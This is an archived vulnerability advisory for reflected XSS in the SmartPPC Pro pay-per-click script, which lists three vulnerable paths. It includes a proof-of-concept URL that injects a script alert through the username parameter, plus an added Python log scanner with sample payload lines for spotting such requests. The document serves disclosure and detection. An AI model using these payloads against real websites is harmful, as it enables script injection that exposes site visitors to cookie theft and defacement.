SmartPPCProXSS.txt

Date: 30 Nov 2005 00:00:00
Reported by: BiPi_HaCk
Type: packetstorm
Source: packetstormsecurity.com

SmartPPC Pro Xss vulnerability discovered by Nightmare TeAmZ in 11/2005. Affected products listed with XSS vulnerable paths. No vendor contacted for a solutio

Code
`------------------------------------------------------  
Nightmare TeAmZ Advisory 017  
------------------------------------------------------  
Date - 11/2005  
SmartPPC Pro Xss  
  
  
AFFECTED PRODUCTS  
=================  
SmartPPC Pro  
http://www.orbitscripts.com  
  
  
Overview:  
========  
SmartPPC Standard is a full-featured Pay Per Click Search Engine with   
extended functionality. This script is easy enough for a novice to maintain   
but has the features and power suitable for PPC pros. SmartPPC is the   
solution for customers tired of the limitations of other PPC scripts, and   
customers tired of chasing down the bugs in their custom developed PPC   
search engines. This version has been sold for two years, and our customers   
have earned several million dollars using it. All known bugs were fixed   
during these two years. SmartPPC Standard runs from a different core than   
our popular SmartPPC Lite script. We'd like to emphasize the following   
important features:  
  
  
Xss Vulnerable Path:  
========  
/directory.php?username=[XSS]  
/frames.php?username=[XSS]  
/search.php?username=[XSS]  
  
Proof:  
========  
http://www.[Host].com/[Path]/search.php?keywords=1&username=--><script>alert('Hacked   
By Nightmare TeAmZ');</script>&alt_search=1&submitLuck=I%27m%20Was%20Hacked  
  
Solution:  
========  
1. Vendor Not Contacted  
  
  
Credits  
=======  
This vulnerability was discovered and researched by  
BiPi_HaCk of Nightmare TeAmZ  
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0  
Site: http://www.NightmareSecurity.net <--IT Security Forum  
  
`
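A log check for the three paths listed in the advisory, as an added example that is not part of the original advisory or of this page: it flags requests whose `username` value decodes to markup characters. The combined access-log format, the `/ppc/` install path and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Script names and parameter taken from the advisory's "Xss Vulnerable Path" list.
AFFECTED_SCRIPTS = {"directory.php", "frames.php", "search.php"}
PARAM = "username"
# Characters that let a reflected value leave an HTML comment, tag or attribute.
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # assumed log format

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded), so %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_username(target):
    """Return the decoded username if an affected script receives markup in it, else None."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() not in AFFECTED_SCRIPTS:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Yield (line_number, decoded_value) for each flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hit = suspicious_username(match.group(1))
            if hit is not None:
                yield number, hit

SAMPLE_LOG = [  # constructed entries, not taken from a real server
    '203.0.113.5 - - [30/Nov/2005:10:00:00 +0000] "GET /ppc/search.php?keywords=1&username=alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [30/Nov/2005:10:00:05 +0000] "GET /ppc/search.php?keywords=1&username=--%3E%3Cscript%3Ealert(1)%3C/script%3E&alt_search=1 HTTP/1.1" 200 640',
    '203.0.113.9 - - [30/Nov/2005:10:00:09 +0000] "GET /ppc/frames.php?username=%253Cb%253Ex HTTP/1.1" 200 301',
    '203.0.113.7 - - [30/Nov/2005:10:00:12 +0000] "GET /ppc/index.php?username=%3Cb%3E HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: username={value!r}")
```

Quote characters are included in the match, so legitimate values containing an apostrophe will also be flagged and need triage.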

Vulners AI Score: 7.4 (High risk)